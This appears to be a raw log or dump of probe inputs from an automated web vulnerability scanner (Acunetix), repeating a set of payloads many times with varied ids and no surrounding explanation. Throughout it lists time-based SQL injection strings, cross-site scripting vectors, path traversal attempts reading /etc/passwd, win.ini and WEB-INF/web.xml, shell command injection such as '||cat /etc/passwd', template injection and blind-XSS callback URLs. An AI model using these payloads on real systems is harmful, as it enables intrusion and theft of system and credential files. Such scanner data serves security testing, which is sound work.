1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

1

'

1<ScRiPt >prompt(971237)</ScRiPt>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

)

testasp.vulnweb.com

1

1

-1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985976></ScRiPt>

1

!(()&&!|*|*|

1

1

-1)

1<ScRiPt >prompt(923129)</ScRiPt>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

^(#$!@#$)(()))******

1

1

1<video><source onerror="javascript:prompt(926360)">

-1))

1

1

&dir

/etc/passwd

1

1

1

1

1

1

8axnMGeh'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998431)"></g></svg>

1

1

'&dir&'

1

1<div style=width:expression(prompt(979569))>

MK1kOeCn')

1

1

1

"&dir&"

1

1

1

'"()

KzDITYSY'))

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

|dir

1<body onload=prompt(946261)>

-1

1

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'|dir

1

"

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953512)>

1

comments

http://hitk4czr5rbu3.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=xyz OnErRor=prompt(993789)>

"|dir

1

-1))

1

1<img/src=">" onerror=alert(925118)>

1

${@print(md5(acunetix_wvs_security_test))}\

comments

http://www.acunetix.tst

MAUrY8zd'

1

1<ScRiPt%20>prompt(919755)</sCripT>

comments/.

1

1

1

'"

1

1&lt

1'"()&%<ScRiPt >prompt(985011)</ScRiPt>

HFchzA8B')

file:///etc/passwd

1

<!--

1

1

\xf6<img acu onmouseover=prompt(998661) //\xf6>

'"()&%<ScRiPt >prompt(990973)</ScRiPt>

OmGbyVoJ'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1_909178

1<input autofocus onfocus=prompt(953727)>

1

WEB-INF/web.xml

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

response.write(9243521*9480873)

WEB-INF\web.xml

1

1

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

'+response.write(9243521*9480873)+'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9243521*9480873)+"

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1_u728K <ScRiPt >prompt(908398)</ScRiPt>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../boot.ini

1

"&cat /etc/passwd&"

1

1

1

1

cat /etc/passwd

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

`cat /etc/passwd`

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu3779\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3779

../../../../../../../../../../etc/passwd

1

1

................windowswin.ini

|cat /etc/passwd#

${99040+100089}

acux6117\xc0\xbez1\xc0\xbcz2a\x90bcxuca6117

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<ScRiPt >prompt(901753)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n961877=v939899

../../../../../../../../../../etc/passwd.jpg

1

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(900607)</script>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1<ScRiPt >prompt(937492)</ScRiPt>

'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945245></ScRiPt>

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

-1

^(#$!@#$)(()))******

"

1<ScRiPt >prompt(983007)</ScRiPt>

1

-1)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(938915)">

1

||cat /etc/passwd

-1))

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988374)"></g></svg>

/etc/passwd

1

EmdxT1i7'

1

WEB-INF\web.xml

&dir

GGHZDcNp')

1

1<div style=width:expression(prompt(967913))>

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

1<iframe src='data:text/html

6NLk0yKV'))

'&dir&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

1

-1

1<body onload=prompt(986100)>

"&dir&"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

http://hith3e2pVpylN.bxss.me/

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950929)>

1

|dir

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1<img src=xyz OnErRor=prompt(923413)>

-1))

1

comments

'|dir

1

'"

http://www.acunetix.tst

eSKX6I2v'

1<img/src=">" onerror=alert(948198)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

comments/.

1

<!--

file:///etc/passwd

1

1<ScRiPt%20>prompt(927932)</sCripT>

1

4NGTkCYa')

1

1

1

1

1'"()&%<ScRiPt >prompt(968173)</ScRiPt>

1

WUDZI2oX'))

1&lt

1

1

1

'"()&%<ScRiPt >prompt(931722)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

\xf6<img acu onmouseover=prompt(935317) //\xf6>

1

1

1_916151

1

1<input autofocus onfocus=prompt(972808)>

WEB-INF/web.xml

response.write(9566971*9757976)

1

1

1

WEB-INF\web.xml

'+response.write(9566971*9757976)+'

<a href='http://www.acunetix.com'>website security</a>

1

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

"+response.write(9566971*9757976)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_EPpWK <ScRiPt >prompt(949896)</ScRiPt>

../../../../../../../../../../boot.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

................windowswin.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

${99154+99256}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

acu2107\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2107

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1&n904652=v903330

/../..//../..//../..//../..//../..//etc/passwd.jpg

acux5943\xc0\xbez1\xc0\xbcz2a\x90bcxuca5943

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(912325)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

)

1<script>prompt(920702)</script>

testasp.vulnweb.com

/etc/passwd

1

'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

1<ScRiPt >prompt(921965)</ScRiPt>

!(()&&!|*|*|

1

"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907277></ScRiPt>

^(#$!@#$)(()))******

WEB-INF\web.xml

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1

1<ScRiPt >prompt(925166)</ScRiPt>

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

&dir

-1))

1

1<video><source onerror="javascript:prompt(930522)">

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'&dir&'

l52MHAff'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939421)"></g></svg>

'"()

1

1

1

1

"&dir&"

OY1vnupK')

1<div style=width:expression(prompt(952351))>

1

file:///etc/passwd

1

1

1

rH7oUa0v'))

'

1

1<iframe src='data:text/html

1

|dir

/\../\../\../\../\../\../\../etc/passwd

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1<body onload=prompt(981829)>

1

1

http://hitzY28Kdvi8F.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

WEB-INF/web.xml

1

'|dir

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970220)>

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

1

"|dir

WEB-INF\web.xml

-1))

1<img src=xyz OnErRor=prompt(930075)>

1

1

1

comments

z13m4jHh'

1

1

../../../../../../../../../../windows/win.ini

1<img/src=">" onerror=alert(976608)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

comments

8Ib0FXvQ')

1

1<ScRiPt%20>prompt(980127)</sCripT>

1

1

../../../../../../../../../../boot.ini

comments/.

yFRSYR8p'))

1

1

'"

1&lt

1

1

../../../../../../../../../../windows/win.ini.jpg

1

<!--

1

1

\xf6<img acu onmouseover=prompt(982854) //\xf6>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<input autofocus onfocus=prompt(921851)>

1

1'"()&%<ScRiPt >prompt(923285)</ScRiPt>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(928805)</ScRiPt>

1

1

1

1

response.write(9160365*9240031)

1

..\..\..\..\..\..\..\..\windows\win.ini

1

&cat /etc/passwd&

1_929630

1_tvQWN <ScRiPt >prompt(935395)</ScRiPt>

1

'+response.write(9160365*9240031)+'

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9160365*9240031)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

1

WEB-INF/web.xml

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99311+100170}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

'|'ld

1

WEB-INF\web.xml

1some_inexistent_file_with_long_name%00.jpg

1

1

../../../../../../../../../../etc/passwd.jpg

1

1&n927811=v967856

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

1

1

acu5167\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5167

testasp.vulnweb.com

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

acux2886\xc0\xbez1\xc0\xbcz2a\x90bcxuca2886

)

1

'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1<ScRiPt >prompt(933017)</ScRiPt>

!(()&&!|*|*|

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

-1

1

1<script>prompt(973398)</script>

^(#$!@#$)(()))******

/etc/passwd

1

1

1<ScRiPt >prompt(998271)</ScRiPt>

1

1

||cat /etc/passwd

-1)

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960084></ScRiPt>

-1))

1

1

&dir

'"()

1

1

1

1<ScRiPt >prompt(991606)</ScRiPt>

It8fkvAn'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

IDOu417P')

1<video><source onerror="javascript:prompt(915092)">

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989918)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

1

DEXSAYbW'))

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hit0tOdRfess6.bxss.me/

acunetix_wvs_invalid_filename

1<div style=width:expression(prompt(981805))>

|dir

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

1<iframe src='data:text/html

comments

${@print(md5(acunetix_wvs_security_test))}\

1

'|dir

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<body onload=prompt(969461)>

1

1

CN0D5Ndt'

http://www.acunetix.tst

1

1

"|dir

file:///etc/passwd

'"

comments/.

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953466)>

UDdLcZWm')

1

1

1

1

<!--

8lQr0Yrh'))

1

1<img src=xyz OnErRor=prompt(999276)>

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(910765)</ScRiPt>

1

1

1<img/src=">" onerror=alert(906300)>

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(935958)</ScRiPt>

1

1<ScRiPt%20>prompt(928621)</sCripT>

1

1

1_969132

1&lt

WEB-INF\web.xml

1

1

\xf6<img acu onmouseover=prompt(933552) //\xf6>

1

../../../../../../../../../../windows/win.ini

1

1

1<input autofocus onfocus=prompt(995129)>

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../boot.ini

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

1_PI70p <ScRiPt >prompt(966949)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

WEB-INF/web.xml

1

1

acu4411\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4411

WEB-INF\web.xml

acux6739\xc0\xbez1\xc0\xbcz2a\x90bcxuca6739

1

1

1

1<ScRiPt >prompt(990758)</ScRiPt>

1

1

1

1<script>prompt(933860)</script>

1

1

1<ScRiPt >prompt(967550)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901088></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(957844)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(985995)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976437)"></g></svg>

1

1<div style=width:expression(prompt(944185))>

1<iframe src='data:text/html

1

response.write(9164765*9838837)

1<body onload=prompt(994576)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921503)>

'+response.write(9164765*9838837)+'

1<img src=xyz OnErRor=prompt(959095)>

"+response.write(9164765*9838837)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(901066)>

&cat /etc/passwd&

1

1<ScRiPt%20>prompt(985806)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1&lt

'&cat /etc/passwd&'

1

\xf6<img acu onmouseover=prompt(942428) //\xf6>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<input autofocus onfocus=prompt(935792)>

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

`cat /etc/passwd`

[url=http://www.acunetix.com]website security[/url]

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1_yFtCf <ScRiPt >prompt(914762)</ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99822+100195}

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1&n972920=v979758

1

1

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

"

'"()

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

/etc/passwd

||cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

&dir

'

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

-1)

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"&dir&"

1

-1))

${@print(md5(acunetix_wvs_security_test))}

http://hitBvYSXhiiz0.bxss.me/

acunetix_wvs_invalid_filename

|dir

SVLXtN9P'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

x0w3Az8r')

comments

'|dir

1

1

1

pSwq5wqD'))

1

1

comments

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1

1

http://www.acunetix.tst

comments/.

file:///etc/passwd

1

'"

1

1

1

-1)

1

<!--

1'"()&%<ScRiPt >prompt(928336)</ScRiPt>

1

1

-1))

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

response.write(9686286*9722573)

'"()&%<ScRiPt >prompt(980413)</ScRiPt>

v5KazSrm'

1

1

1

'+response.write(9686286*9722573)+'

1

1

wirM9ZCI')

1_932918

"+response.write(9686286*9722573)+"

1

WEB-INF/web.xml

1

&cat /etc/passwd&

1

1

YtD56PCQ'))

WEB-INF\web.xml

1

1

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

../../../../../../../../../../boot.ini

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

${99831+99907}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

1

1&n975964=v911701

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

'|'ld

..\..\..\..\..\..\..\..\windows\win.ini

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

"|"ld

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu10375\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10375

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

)

/etc/passwd

acux1261\xc0\xbez1\xc0\xbcz2a\x90bcxuca1261

'

!(()&&!|*|*|

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(934070)</ScRiPt>

"

1

^(#$!@#$)(()))******

1<script>prompt(948040)</script>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

||cat /etc/passwd

1<ScRiPt >prompt(961718)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'"()

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928430></ScRiPt>

WEB-INF/web.xml

&dir

1

1

1

1

-1

WEB-INF\web.xml

'&dir&'

1<ScRiPt >prompt(928215)</ScRiPt>

1

-1)

1

'

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<video><source onerror="javascript:prompt(988475)">

1

1

1

"&dir&"

1

"

ZW3K7CIQ'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945220)"></g></svg>

|dir

1

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1<div style=width:expression(prompt(993680))>

Qk01zbSe')

1

1

'|dir

${@print(md5(acunetix_wvs_security_test))}\

r7pU75ei'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1<iframe src='data:text/html

"|dir

1

1

acunetix_wvs_invalid_filename

-1

1

WEB-INF/web.xml

1<body onload=prompt(965930)>

http://hitJqpxHKnDV9.bxss.me/

1

-1)

comments

1

1

1

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954210)>

comments

-1))

1

1

1

1<img src=xyz OnErRor=prompt(916949)>

1

../../../../../../../../../../windows/win.ini

Q8Z16D4T'

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img/src=">" onerror=alert(900297)>

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt%20>prompt(901323)</sCripT>

1

Gv2HaBe2')

http://www.acunetix.tst

1

1

1

1

1&lt

../../../../../../../../../../windows/win.ini.jpg

'"

BMsEucXp'))

1'"()&%<ScRiPt >prompt(913411)</ScRiPt>

1

1

1

'"()&%<ScRiPt >prompt(977222)</ScRiPt>

1

<!--

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

\xf6<img acu onmouseover=prompt(960076) //\xf6>

response.write(9977269*9566478)

................windowswin.ini

1_901712

1

1

'+response.write(9977269*9566478)+'

1

1

1<input autofocus onfocus=prompt(903618)>

..\..\..\..\..\..\..\..\windows\win.ini

"+response.write(9977269*9566478)+"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1_nW2bb <ScRiPt >prompt(932646)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${100322+100454}

1

1

|cat /etc/passwd#

1

1

WEB-INF/web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1&n912991=v915721

WEB-INF\web.xml

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

